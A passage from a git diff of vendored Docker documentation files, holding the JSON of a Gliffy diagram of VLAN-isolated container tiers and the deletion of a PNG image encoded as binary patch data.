"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.30.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":379,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":32,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":380,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":214.0,"y":503.0100878848685,"rotation":0.0,"id":374,"width":135.0,"height":20.162601626016258,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Backend

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":376.0,"y":502.0100878848684,"rotation":0.0,"id":373,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Credit Cards

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":627.0,"y":99.94304076572786,"rotation":0.0,"id":364,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":25,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":363,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":342,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-183.0,310.0670471191406],[-183.0,292.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":410.0100878848684,"rotation":0.0,"id":363,"width":144.0,"height":117.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":218.0,"y":341.5100878848684,"rotation":0.0,"id":366,"width":132.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Parent: eth0.20

VLAN ID: 20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":297.0,"y":89.94304076572786,"rotation":0.0,"id":356,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":22,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":353,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":343,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-13.0,320.0670471191406],[-13.0,302.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":222.0,"y":420.0100878848684,"rotation":0.0,"id":348,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":21,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":349,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":350,"width":98.00597014925374,"height":44.0,"uid":null,"order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6
,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container(s)

Eth0 10.1.20.0/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":351,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":352,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":13,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":410.0100878848684,"rotation":0.0,"id":353,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":212.0,"y":332.0100878848684,"rotation":0.0,"id":343,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rect
angle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#fca13f","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":203.0,"y":307.5100878848684,"rotation":0.0,"id":333,"width":160.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 Interface

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":303.0,"y":240.51008788486845,"rotation":0.0,"id":323,"width":261.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":8,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

802.1Q Trunk - can be a single Ethernet link or Multiple Bonded Ethernet links

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.0,"y":291.0100878848684,"rotation":0.0,"id":290,"width":497.0,"height":80.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":543.5100878848684,"rotation":0.0,"id":282,"width":569.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host: Frontend, Backend & Credit Card App Tiers are Isolated but can still communicate inside parent interface or any other Docker hosts using the VLAN ID

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-33.0,"y":79.94304076572786,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":5,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":345,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":340,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":1.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[157.0,330.0670471191406],[157.0,312.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":410.0100878848684,"rotation":0.0,"id":345,"width":144.0,"height":119.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":323.0100878848684,"rotation":0.0,"id":276,"width":531.0,"height":259.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"l
ayerId":"9wom3rMkTrb3"},{"x":19.609892022503004,"y":20.27621073737908,"rotation":355.62347411485274,"id":246,"width":540.0106597126834,"height":225.00000000000003,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":2,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":1.0,"y":99.94304076572786,"rotation":0.0,"id":394,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.5670471191406],[261.0,108.05111187584177]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.0,"y":90.94304076572786,"rotation":0.0,"id":481,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":3.0,"strokeColor":"#666666","fillColor":"#999999","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[261.0,233.56704711914062],[261.0,108.05111187584174]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 
0","active":true,"locked":false,"visible":true,"nodeIndex":104}],"shapeStyles":{},"lineStyles":{"global":{"fill":"#999999","stroke":"#38761d","strokeWidth":3,"dashStyle":"1.0,1.0","orthoMode":2}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"14px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117295143,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png deleted file mode 100644 index 32d95f600e1d0f028e5a354584d7b3eac1639e35..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 38837 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 
